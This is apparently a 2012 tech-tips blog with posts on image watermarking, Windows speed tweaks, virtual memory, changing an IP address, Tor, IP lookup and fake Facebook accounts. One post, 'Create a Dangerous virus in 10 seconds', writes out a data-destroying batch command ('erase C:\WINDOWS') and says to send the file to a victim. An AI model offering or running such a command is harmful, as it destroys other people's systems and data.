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13.12.12

How To Protect Image Theft from Website



You can’t prevent everyone from using your posts. If you don’t want the users to download or steal your images, the best and most effective way is not upload them online! You can’t completely eliminate others from using your images. However, you can work on a few techniques to make it really hard for others who try to steal your images.

1. Add Watermark

Watermark is possibly the most effective and simple way of ensuring image protection. Watermark is a visual copyright placed on an image. The bigger the watermark is, the harder it becomes to steal the image or download them without authorization. However, it is a visual distraction for users who try to view the image.

2. Post Low Resolution Image

Posting a low resolution image is another way of protecting the images. Uploading an image with 550 pixels saved with 72 dpi is a perfect size to upload and makes it look decent while viewing online. At the same time, the image leaves more or less no room to work on for people who download.

3. Disable Right-Click on Webpages

Most people copy images by just right clicking and downloading the images. If you post images on your website, you can prevent “right clicking” by placing the images as background to tables. You can do it easily by following a simple code in CSS. Alternate way to prevent right clicks by using a JavaScript. These scripts override the right clicks when someone tries to copy the image.

4. Indexing Technique

People can misuse your images only when it comes under the search engine indexing. You can protect your images from being indexed by the search engine spiders. Using a non-index (noindex) and un-follow (nofollow) tags eliminates the entire webpage from getting indexed. However, if you want only the content to be indexed and not the image all you need is a Meta tag. The Meta information prevents the spiders from indexing just the image.

These are some of the techniques you can follow to protect your images from online thefts! If you really wish to share your images on a public forum, you have to take all the possible steps to protect them. Though these take time, you will not get a nasty surprise when you see your image on a different website!

How To Speed-up Windows



1. Speeding up your Windows PC startup time :

You can optimize your computer’s startup speed by launching Run on your Windows computer and typing “msconfig” without the quotes. This will take you to the System Configuration Settings which has five tabs – General, Boot, Services, Startup, and Tools.

Under the General tab, you’ll find 3 startup selections: normal, diagnostic, and selective. During normal startup, all device drivers and services will be loaded by your computer. If this is ticked, it may be the reason why your computer is taking long. Choose either diagnostic or selective startup to speed up the starting time of your Windows computer. Diagnostic startup only loads basic devices and services whereas with selective startup, you can choose to load neither system services nor startup items. After making a selection select “Apply.”

Under the Boot tab, select Advanced options so you can choose the number of processors to facilitate boot speed. If you have a dual-core or quad-core processor, assigning more than one of them to help with the start-up process can significantly boost your computer’s speed. Unfortunately, this optimization tweak is not so efficient on power so if you’re using a laptop, expect some battery drain after startup.

Finally, there’s the Services and Startup tab where you can specifically choose which services and startup items are going to load.

2. Speeding up your Windows Start Menu :

The Start Menu is another serious offender as it often takes time to load. Once again you need to open Run but this time, you will type “regedit.exe” to launch the Registry Editor. Go to the HKEY_CURRENT_USER folder and find Control Panel –> Desktop –> MenuShowDelay. Then, double click MenuShowDelay to edit its value. Type in the numbers on the blank and hit “OK.” Remember, the lower the value the faster the Start Menu will load.

Another trick for speeding up your Windows Start Menu would be to limit the number of shortcuts on your desktop. It could be that you just have too many icons on your desktop and that’s what is causing your computer to take long when loading the Start Menu.

3. Speeding up the Right Click Menu :

Yet another disappointing slow-down that Windows users experience is the time it takes the Menu to show up when hitting the right click. Installing third-party programs that allow you to remove items from the context menu should speed it up.

25.10.12

Speed up your downloads with IDM



Speed up your downloads with IDM :

 Internet Download Manager is a tool for increasing download speeds by up to 5 times, and for resuming, scheduling, and organizing downloads.

 The program will resume unfinished downloads due to network problems, or unexpected power outages. 

The program features a full-fledged site grabber that downloads files that are specified with filters, for example, all pictures from a Web site, different parts of Web sites, or complete Web sites for offline browsing. 

The program supports HTTP, HTTPS, FTP and MMS protocols, and has an adaptive download accelerator for MP3 audio, FLV and MPEG video files. 

The program also features Download Video and Audio Panels for Internet Exporer, Chrome, Opera, Safari, Firefox and other Mozilla based browsers that appears on top of a web-player and can be used to download flash videos from sites like YouTube, MySpaceTV, Google Videos

Click here to download!!

on Thursday, October 25, 2012 by  |  

15.10.12

How to increase Virtual RAM





How to increase Virtual RAM


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 3000-4500 , and for the Maximum size type in anywhere from 3000-4500 .

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

How to quickly change your IP address





 To quickly change your IP address :

 
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "Command" and hit ok

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

10.10.12

Tor Browser : Used for Hardcore Hacking And for opening Hidden and blocked Websites on the Internet




You wont believe, but this is used to open hidden websites which were banned after analyzing that those websites had working hacks. It mainly includes websites with domain .onion just similar to .com, .in, .org and others

What is tor??
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

Why Tor is needed??
Using Tor protects you against a common form of Internet surveillance known as "traffic analysis." Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you're travelling abroad and you connect to your employer's computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.

A basic problem for the privacy minded is that the recipient of your communications can see that you sent it by looking at headers. So can authorized intermediaries like Internet service providers, and sometimes unauthorized intermediaries as well. A very simple form of traffic analysis might involve sitting somewhere between sender and recipient on the network, looking at headers.

How Tor Works??


How Tor works
Tor helps to reduce the risks of both simple and sophisticated traffic analysis by distributing your transactions over several places on the Internet, so no single point can link you to your destination. The idea is similar to using a twisty, hard-to-follow route in order to throw off somebody who is tailing you — and then periodically erasing your footprints. Instead of taking a direct route from source to destination, data packets on the Tor network take a random pathway through several relays that cover your tracks so no observer at any single point can tell where the data came from or where it's going.
To create a private network pathway with Tor, the user's software or client incrementally builds a circuit of encrypted connections through relays on the network. The circuit is extended one hop at a time, and each relay along the way knows only which relay gave it data and which relay it is giving data to. No individual relay ever knows the complete path that a data packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to ensure that each hop can't trace these connections as they pass through.
Tor circuit step two
Once a circuit has been established, many kinds of data can be exchanged and several different sorts of software applications can be deployed over the Tor network. Because each relay sees no more than one hop in the circuit, neither an eavesdropper nor a compromised relay can use traffic analysis to link the connection's source and destination. Tor only works for TCP streams and can be used by any application with SOCKS support.
For efficiency, the Tor software uses the same circuit for connections that happen within the same ten minutes or so. Later requests are given a new circuit, to keep people from linking your earlier actions to the new ones.
Tor circuit step three

Hidden Services In Tor
Tor also makes it possible for users to hide their locations while offering various kinds of services, such as web publishing or an instant messaging server. Using Tor "rendezvous points," other Tor users can connect to these hidden services, each without knowing the other's network identity. This hidden service functionality could allow Tor users to set up a website where people publish material without worrying about censorship. Nobody would be able to determine who was offering the site, and nobody who offered the site would know who was posting to it. Learn more about configuring hidden services and how the hidden service protocol works.

Browse or surf the internet as Anonymous
Tor can't solve all anonymity problems. It focuses only on protecting the transport of data. You need to use protocol-specific support software if you don't want the sites you visit to see your identifying information. For example, you can use Torbutton while browsing the web to withhold some information about your computer's configuration.
Also, to protect your anonymity, be smart. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast enough for web browsing, Tor does not provide protection against end-to-end timing attacks: If your attacker can watch the traffic coming out of your computer, and also the traffic arriving at your chosen destination, he can use statistical analysis to discover that they are part of the same circuit.
The Future of Tor
Providing a usable anonymizing network on the Internet today is an ongoing challenge. We want software that meets users' needs. We also want to keep the network up and running in a way that handles as many users as possible. Security and usability don't have to be at odds: As Tor's usability increases, it will attract more users, which will increase the possible sources and destinations of each communication, thus increasing security for everyone. We're making progress, but we need your help. Please consider running a relay or volunteering as a developer.
Ongoing trends in law, policy, and technology threaten anonymity as never before, undermining our ability to speak and read freely online. These trends also undermine national security and critical infrastructure by making communication among individuals, organizations, corporations, and governments more vulnerable to analysis. Each new user and relay provides additional diversity, enhancing Tor's ability to put control over your security and privacy back into your hands.

Download Link:
https://www.torproject.org/download/download-easy.html.en

Create a Dangerous virus in 10 seconds

Here is a simple and easy trick to make a virus in less than 10 seconds.

CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.

HERE'S THE Trick To Make the virus:

1.Go to notepad, 
2. Type 


erase C:\WINDOWS

3. Save IT AS SOMETHING.cmd , 
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

Note: This works only if he has installed Windows OS and if it is installed in C derive only.

         If you know in which drive he has installed Windows OS just change the code like , if he has installed it D drive, put the code as some thing like below


erase D:\WINDOWS

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care, it is a simple but powerful virus.
Posted in ,  on Wednesday, October 10, 2012 by Anonymous |  

How can your location be traced Via your IP


Ip gives it all
Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.

This has some great tools that will help you. You can enter IP/URL/Domain name and much more.

Above is a pic of what it can do (It gives your location. who is your internet provider, how you are connected to him.
This software costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him

What if you dont want to download any thing. then there are some online tools

Samspade.org


net4domain.com


visualware.com and more.
Posted in ,  on Wednesday, October 10, 2012 by Anonymous |  

4.10.12

83 Million Accounts Are Found Fake in Facebook




According to Facebook, there are about 83 million accounts on their network that they believe to be fake.


Earlier this week, Facebook produced documents in front of the Securities and Exchange Commission that stated that out of the social network's 955 million users 8.5% are thought to be bogus. Out of these 8.5% accounts 4.8% belong to users who maintain duplicate accounts.

Maintaining duplicate accounts does violate the terms and conditions of Facebook but the largest proportion of fake accounts is comprised of it. Users usually prefer two accounts in order to keep their personal and social life separate. Totally understandable, right? No one wants to mingle these two parallel universes to collide with each other.


The second largest proportion of bogus accounts comprises of 'user-misclassified' accounts. These accounts have been created by people in honour of their cat, dog, business, favourite soccer team and what not. Basically, some 2.4% of 8.5% accounts are 'user-misclassified' and created in adoration of a 'non-human entity'. We wonder if making a Facebook page is too complicated a process for the 2.4%.

The third and final award goes to a group of people that we admire the most because Rafay's Geniuses are paid to write about these mean, green, viral machines! 1.5% or 14 million of 83 million fake accounts are categorised as 'undesirable' by Facebook. These accounts are created for the purpose of sending out spam or malicious content and links to other Facebook users.

872 million users on Facebook are genuine and legit. These users need to be able to breathe freely on Facebook without the fear of getting attacked by viruses. I mean, c'mon! We choose to socialize on our laptops rather than face to face so that we wouldn't have to bear the extra baggage that comes along with it. We deserve to feel safe, as safe as heaven, on a site where we spend hours and share our life's ''status'' on! It only makes sense that companies running businesses and advertising on Facebook through pages would want genuine 'likes' from genuine profiles too. Hence, telling us why these accounts are known as 'undesirable'.


Facebook also states that these fake accounts are 'customary' in countries where Facebook isn't as established, for example, Turkey and Indonesia. But the real question is, is Facebook going to 'face' an issue regarding these bogus accounts (pun intended).

Bogus or not, its going to be very difficult for Facebook to separate the fake from the real as very few credentials are needed to create Facebook accounts. Whatever the case maybe, enjoy while you still can dear Fakers!

Cheers!
Posted in  on Thursday, October 04, 2012 by Anonymous |